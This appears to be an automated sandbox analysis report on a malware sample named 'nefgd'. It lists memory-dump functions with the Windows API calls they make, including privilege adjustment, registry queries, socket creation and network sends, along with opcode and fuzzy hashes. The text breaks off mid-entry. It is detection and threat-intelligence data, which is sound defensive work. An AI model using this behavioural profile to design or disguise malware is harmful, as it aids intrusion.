NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 06122EF5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 97d90e1dffab4ddfc4b28fa9af78e01fc6758f86a989622a51a586a35508ddbe
Instruction ID: 4fcf827bac549659cf926d33ce5ca012793706f58309455764ef7e5eef26f128
Opcode Fuzzy Hash: 97d90e1dffab4ddfc4b28fa9af78e01fc6758f86a989622a51a586a35508ddbe
Instruction Fuzzy Hash: 79219A7140D3C09FDB138F219C50A92FFB0EF07220F0985CAE9C44B563D265A919DB62

Function 06122576 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 061225BF

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 9c15812d90eaeb212fc3b785cadd7edd1cf3c61f55d4ea94d80b8b2610e52267
Instruction ID: 40a552efc9ac7ae21a37318a83bfcfa9ab3f4fb0d76d6d6d26b04ca17ef06742
Opcode Fuzzy Hash: 9c15812d90eaeb212fc3b785cadd7edd1cf3c61f55d4ea94d80b8b2610e52267
Instruction Fuzzy Hash: AB11E0715002059FDB20CF55C984BA6FBE4EF04220F08C8AAED468B661D335E529DF61

Function 06122EBA Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 06122EF5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 6ca9b546a0e609f1c59cf974e9cb5b8393b0e745d491905ae3a15eeee6336b90
Instruction ID: 6cfbf3bc9a52359c07ad3bc93233b1d4cb3c0cae51cca540c8ef24740ecbb45b
Opcode Fuzzy Hash: 6ca9b546a0e609f1c59cf974e9cb5b8393b0e745d491905ae3a15eeee6336b90
Instruction Fuzzy Hash: 5101DF31400244DFDB60CF45D944B66FBE0EF05220F08C59ADE450B662C375E529CBA2

Function 05829BC4 Relevance: 3.2, APIs: 2, Instructions: 249libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05829C07
LdrInitializeThunk.NTDLL ref: 05829CBC

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9120d2a37c55299a649a46602de6ab714661ae6a327a360ee7ad984e07169b2
Instruction ID: 50d43c36db613ed2fd3838bd0e65fc1a46fb4751a74061cfe39d4daa28839fd0
Opcode Fuzzy Hash: e9120d2a37c55299a649a46602de6ab714661ae6a327a360ee7ad984e07169b2
Instruction Fuzzy Hash: FFA16734A042248FDB68DB35D8547A9B7F2EF88305F1081A9D80AE7394EB799DC5CF91

Function 05829BBB Relevance: 3.2, APIs: 2, Instructions: 244libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05829C07
LdrInitializeThunk.NTDLL ref: 05829CBC

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 853f049f7161bf51dcc67cbaa1dd01f145ea9bc3ec498109ee69ab2a71a8b47e
Instruction ID: 12251c758aa9f569be01b6649b0c84d92bb4db164084a09e163fce5d6060eb21
Opcode Fuzzy Hash: 853f049f7161bf51dcc67cbaa1dd01f145ea9bc3ec498109ee69ab2a71a8b47e
Instruction Fuzzy Hash: 3EA17A34A042248FDB68DB35D8547A9B7F2EF88305F1081A9D80AE7394EB799DC5CF91

Function 06C3EAA8 Relevance: 1.9, APIs: 1, Instructions: 436
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06C3EF4E

Memory Dump Source

Source File: 00000003.00000002.4518698738.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c30000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa629457b7118d3f1448923da28c0c196993075b07f597517778955418a4dc68
Instruction ID: 024a8438bf2b2610f7edbe16393969b81c080518ea9bd9bc9ce37048811b57fe
Opcode Fuzzy Hash: fa629457b7118d3f1448923da28c0c196993075b07f597517778955418a4dc68
Instruction Fuzzy Hash: 8CF15A34F002158FCB54EBA8D494AADB7F2EF88304F24C56AD406AB395DB35ED46CB91

Function 06DA0F00 Relevance: 1.8, APIs: 1, Instructions: 331
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA0F51

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa8fdf06e80f362cc96c5dfbf9ef4ea084d37cdb5ea5c694a20d3d5511e8180e
Instruction ID: 285c972b49c900c30996a658b5f4bcbddc282edc817ed6d36c45c5d19eb7d81a
Opcode Fuzzy Hash: aa8fdf06e80f362cc96c5dfbf9ef4ea084d37cdb5ea5c694a20d3d5511e8180e
Instruction Fuzzy Hash: ADC18B34B042188FCB44DFB8C8946ADB3F2EF88314F218529D486AB765DB35EC46CB95

Function 06DA0EF1 Relevance: 1.8, APIs: 1, Instructions: 317
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA0F51

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e03485af294d8a3dd757065f8acda7b311daa15f9d2a00c6470d614c14fbc830
Instruction ID: 550eb869c9d010f5f0d494ece31db3d2a22b0f4b1ddfe42a73e71d18f1e79e93
Opcode Fuzzy Hash: e03485af294d8a3dd757065f8acda7b311daa15f9d2a00c6470d614c14fbc830
Instruction Fuzzy Hash: 91C17D34B042188FCB54DFB8C9946ADB7F2EF88314F218529D486AB765DB35EC46CB84

Function 06DA0070 Relevance: 1.7, APIs: 1, Instructions: 196
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA00AE

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f23957b53ee9436c562aee04dd859a5487fc85402f4ae1fee4b57c667e34c37a
Instruction ID: 8b246957424ad1c093aed26512f28ef4a1c00ee2f04b7cb28d84c2de8ab37a40
Opcode Fuzzy Hash: f23957b53ee9436c562aee04dd859a5487fc85402f4ae1fee4b57c667e34c37a
Instruction Fuzzy Hash: 80713A34A043099FDB54DFA4D494BAEBBF2AF88318F248429D405AB394DB79EC45CB91

Function 06C3EEE8 Relevance: 1.6, APIs: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06C3EF4E

Memory Dump Source

Source File: 00000003.00000002.4518698738.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c30000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9c8b79abc77f19a8314cf060484ec37b771438dc864e52973f49b3952977c4a
Instruction ID: ead6d6ce51cef2ea2f36b20bc7a6d519d53b4420bbfea504b3b06ad651df936f
Opcode Fuzzy Hash: f9c8b79abc77f19a8314cf060484ec37b771438dc864e52973f49b3952977c4a
Instruction Fuzzy Hash: 66517F75B001159FCB44DB78D854AAEB7F6EB88304F208529E406EB394EF359D45CBA1

Function 06DA36C8 Relevance: 1.6, APIs: 1, Instructions: 135
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA37D1

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4650e5263bf1d4b0c00c852dacff7b643c233f6196b90589c33b09563246d5f8
Instruction ID: d7167eea691067f57dac93b606b0d963ef415a36ec8a709e78f9bce43acade0c
Opcode Fuzzy Hash: 4650e5263bf1d4b0c00c852dacff7b643c233f6196b90589c33b09563246d5f8
Instruction Fuzzy Hash: 1141BEB0F143409FC768DF7495906AEB7B3EB89244F62842ED146C7B44E736E8858B90

Function 05821D69 Relevance: 1.6, APIs: 1, Instructions: 123
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05821E71

Memory Dump Source

Source File: 00000003.00000002.4511534588.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5820000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b62addccf6ab5bb668307ba58b6d83997d5a2b6107d5bf87e904c5184f13db40
Instruction ID: 46ba04e54730fd3051c32d6d8f323297fb0c363d0a441d3803609005df1a29ca
Opcode Fuzzy Hash: b62addccf6ab5bb668307ba58b6d83997d5a2b6107d5bf87e904c5184f13db40
Instruction Fuzzy Hash: 22419070B083109FC728CF74D5946AE7BE2FB85704B20856EEA12A7B54E736EC85CB50

Function 06DA36D8 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA37D1

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7a072906486e315ea8e12bb933850b6e0555f8f968810a9e9f4f16a3b5bbe939
Instruction ID: acebdbf6934d153ee5b6c8c15f4d0e584b1f7744aa0b62b560cd2c1c33a6a896
Opcode Fuzzy Hash: 7a072906486e315ea8e12bb933850b6e0555f8f968810a9e9f4f16a3b5bbe939
Instruction Fuzzy Hash: 07419EB0E143409FC7689FB0969066EB7B3EB85644F62892ED142C7B44E736E845CBA0

Function 0174BD62 Relevance: 1.6, APIs: 1, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0174BE21

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a6f51a1fe58322e8ea5d7f26abb704312ab754d4b5dddc8908f278b111edcad0
Instruction ID: 7a2e30c75055004c1e76ca39f8dd3bc2eb8471fb74ff4873e666ac7c49340cae
Opcode Fuzzy Hash: a6f51a1fe58322e8ea5d7f26abb704312ab754d4b5dddc8908f278b111edcad0
Instruction Fuzzy Hash: 5231B371509380AFE722CF65DC44BA2BFE8EF46314F08449AE9858B653D375E809DB71

Function 06122047 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0612211F

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: b42dfa007facea4d4d2f69337febd01ab4a1d796a945b965cf6711f2fa563745
Instruction ID: a2ca2f8b37266d5d1a517195b92261acff0cde64c7af8f6b599a80c498a222b4
Opcode Fuzzy Hash: b42dfa007facea4d4d2f69337febd01ab4a1d796a945b965cf6711f2fa563745
Instruction Fuzzy Hash: D031C7B1504384AFE7218F60CC44FAABBBCEF05714F04449AFA849B592D375A949CB71

Function 061217A2 Relevance: 1.6, APIs: 1, Instructions: 100
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 06121859

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 0556cfc8eebc94171d2521406c24e02be69be4fb21cfca830480ea7db1c8b889
Instruction ID: e817926c101965f97b21b1a8768eaa62422f9aa67e08e8df330ff990a683bb02
Opcode Fuzzy Hash: 0556cfc8eebc94171d2521406c24e02be69be4fb21cfca830480ea7db1c8b889
Instruction Fuzzy Hash: 6C31B6B2404344AFD722CF50CC45FA7BFACEF45310F04899AE9858B552D364E909CBB1

Function 0612141F Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 061214E2

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c5152acee46bbf93d2e9d16d1bbcc85a3e887c687356359ef2085576e523e4b8
Instruction ID: 87dc64b88062d3f95569527e7c7439c1cef2454a7f1bb02f223da2de3e214cd5
Opcode Fuzzy Hash: c5152acee46bbf93d2e9d16d1bbcc85a3e887c687356359ef2085576e523e4b8
Instruction Fuzzy Hash: 9431907154D3C45FD3038B258C61AA2BFB4EF47614F0A84CBD8C48F6A3D625A91AD7B2

Function 061203F8 Relevance: 1.6, APIs: 1, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 061204AA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1cdeb1f76234ddec54f9340df09f3ea4da1f61ee20f848be2325737a389898fa
Instruction ID: 3315313b3b0c6e200579e8da5951679717c24cf6caae656ff4ddafd8c83f3c07
Opcode Fuzzy Hash: 1cdeb1f76234ddec54f9340df09f3ea4da1f61ee20f848be2325737a389898fa
Instruction Fuzzy Hash: 803190714093C0AFD723CB65CC45B56BFB8EF06210F0885DAE9858B5A3C369A819CB72

Function 06DA0013 Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06DA00AE

Memory Dump Source

Source File: 00000003.00000002.4519144762.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da0000_nefgd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e30b2c76ffb7a01fc3e32451e8f86977f620309915a299589de9e738c0ab1b02
Instruction ID: 821eceeca42b465533fb1622aec2c43de98bdf0ccbcbede629486b61f5e9c2d9
Opcode Fuzzy Hash: e30b2c76ffb7a01fc3e32451e8f86977f620309915a299589de9e738c0ab1b02
Instruction Fuzzy Hash: AF319E708193889FCB56CF74C894AEEBFB1AF46308F1584AAD081AB262D7354C49CB91

Function 06121134 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 061211D3

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7c7b05c370e65fc0ef2f2898bb47928cae4cb9b26c47fc560afcf01b9f4589d8
Instruction ID: 7b25127be3a7611937be52df963f38201204c10e6d55fc8d9fbdd18a873b99a1
Opcode Fuzzy Hash: 7c7b05c370e65fc0ef2f2898bb47928cae4cb9b26c47fc560afcf01b9f4589d8
Instruction Fuzzy Hash: 9931B3B1504344AFEB228F61DC44FABBBACEF05214F04485AF985CB552D325A4198B61

Function 06121321 Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061213D5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: b5ac31cdfc52eb6c2e9cec6054fa7c04f3c0b1ff782d4ce6f6233ddf59780e40
Instruction ID: c09e733d7a68996b2ca3058278789f08a65ff3a76754414dda46d58a32409937
Opcode Fuzzy Hash: b5ac31cdfc52eb6c2e9cec6054fa7c04f3c0b1ff782d4ce6f6233ddf59780e40
Instruction Fuzzy Hash: 2131AE71508780AFD722CF60CC44FA2BFF8FF06314F08859AE9858B562D321E919CB61

Function 061219A2 Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 06121A4E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eae2f6abe8a6c522002c34c77146e35b68bc4edaa3eaa4babc367f09dadb969f
Instruction ID: 80b05d8295b0bb418623c58a39764365692b5e897c03b2eafdf1868ad59bd19d
Opcode Fuzzy Hash: eae2f6abe8a6c522002c34c77146e35b68bc4edaa3eaa4babc367f09dadb969f
Instruction Fuzzy Hash: 3731C7B1409384AFD722CB60DC45F66BFB8EF06314F08849AE9848B663D325A90DC771

Function 06120820 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 061208B7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 1580e0dd026139e410aa8877caa02bb1fd90fcc390ad773edae5cbd4c65c87ef
Instruction ID: de87998d18fe2784ecedd8dc84f13e191413c7a292f6bdf706ee0eeb9a4e21d1
Opcode Fuzzy Hash: 1580e0dd026139e410aa8877caa02bb1fd90fcc390ad773edae5cbd4c65c87ef
Instruction Fuzzy Hash: 6031B171508385AFEB21CB64DC44FABBFACEF05210F08849AE985CB652D324E819CB61

Function 0174B6CD Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0174B788

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0540d88ad31a8cf87b17eac9a80d8b483642bd7c4457c875bcb1a1ad3b433541
Instruction ID: 8550533717ca340887ac145b52fe94cdb03e7b6148e5d2610a0c89f03d8fa064
Opcode Fuzzy Hash: 0540d88ad31a8cf87b17eac9a80d8b483642bd7c4457c875bcb1a1ad3b433541
Instruction Fuzzy Hash: 6131AF751093849FE722CF25CC84FA2FFB8EF06214F08849AE9858B653D364E949CB61

Function 06124038 Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 061240EA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 672348f194e62549b3bfcc76cf4f3052da38c0f0a6da73353b52593c05822dcf
Instruction ID: c988e7c3ec6c5421317f1697297109acbff4f6501d7fbaecca2d497a0f2ee278
Opcode Fuzzy Hash: 672348f194e62549b3bfcc76cf4f3052da38c0f0a6da73353b52593c05822dcf
Instruction Fuzzy Hash: CD314B7154E3C15FC3138B658C61A66BFB4EF47220B0A85CBD884CB5A3D229A919D7A2

Function 06121231 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061212D7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d4a373ddd2adaaf343164a4ddf2f68d4857326023886cb82d7444b04db7ac05f
Instruction ID: f2adfbfc5df87de557a0c266c9e36a55ddd82319c080c55fac2174e5f91a6002
Opcode Fuzzy Hash: d4a373ddd2adaaf343164a4ddf2f68d4857326023886cb82d7444b04db7ac05f
Instruction Fuzzy Hash: 3B31AF714097846FD712CB20CC45B96BFB8EF06220F0985DAE9858F5A3C325A908C761

Function 06120AC2 Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 06120B6A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: c49135a11bcd2919566db4dac357fdbd0fc78a1b18e10fbee5219f1c43e90d16
Instruction ID: 22192f4cc19836b72c1b62e0e38a8de513e25c3dfc6001d6d667f59aa8e05d3e
Opcode Fuzzy Hash: c49135a11bcd2919566db4dac357fdbd0fc78a1b18e10fbee5219f1c43e90d16
Instruction Fuzzy Hash: EB31E471409380AFD722CF61CC44F96FFF8EF0A214F08849EE9848B652D365A549C772

Function 06120722 Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061207CC

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2ac18c1b7795f2da7b5b7359b33cd7f482bdd5792f1a2d34d7505b2de4fa2fcc
Instruction ID: 41b9ee2548bc9ac824a266ef6d38913662362b89b8a093d6c62ced515de9858c
Opcode Fuzzy Hash: 2ac18c1b7795f2da7b5b7359b33cd7f482bdd5792f1a2d34d7505b2de4fa2fcc
Instruction Fuzzy Hash: A031B1724093806FD722CB61CC44F92BFF8EF06210F0885DAE9C58B5A3D364A949CB71

Function 0174B5D9 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0174B685

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 52ce63dd636b7a4120851fcf1a946b476d7ad6fba32e743df9b346aa7924c812
Instruction ID: d066b37f1787d15a4825d6f684478fe88e29d38b680f7fdc1af79499ffec3da6
Opcode Fuzzy Hash: 52ce63dd636b7a4120851fcf1a946b476d7ad6fba32e743df9b346aa7924c812
Instruction Fuzzy Hash: 36218471408384AFE7218F55CC84FA7FBBCEF05314F04859AE9858B652D325E949CB65

Function 06120D6D Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 06120E0D

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 063c1409560d14c47387d05d5eb7fceee2129e84fd94ba42c42d97c22a506baa
Instruction ID: 3fa522c4db166386175c938118a76f8dbd4e41dc3cc3b242d6cca78cdbb7b09f
Opcode Fuzzy Hash: 063c1409560d14c47387d05d5eb7fceee2129e84fd94ba42c42d97c22a506baa
Instruction Fuzzy Hash: 7431B4B1509384AFE711CF25DC45F96FFF8EF06210F08859AE9848B692D365E848CB61

Function 06121036 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061210C9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: f7b27d8a51f423b0e078c0a9531fe2986297d2a51a91fbe4f4fa5cef89c83685
Instruction ID: d5fa8008bca88ecd92942c767411bc63445f99279beec7a331352182c905ef53
Opcode Fuzzy Hash: f7b27d8a51f423b0e078c0a9531fe2986297d2a51a91fbe4f4fa5cef89c83685
Instruction Fuzzy Hash: CF21B472509380AFD722CF61CC45F96FFB8EF46210F08849AE985CF552D325A849CB75

Function 06124E70 Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06124F0C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 047d2cca42c58713aad042b8e14d5d6945ad0af0a4292a2ddb48fb674c69a253
Instruction ID: 0670b18b78984393b838b6241433612ae5c8ac47fd155280176c09be2dc594f1
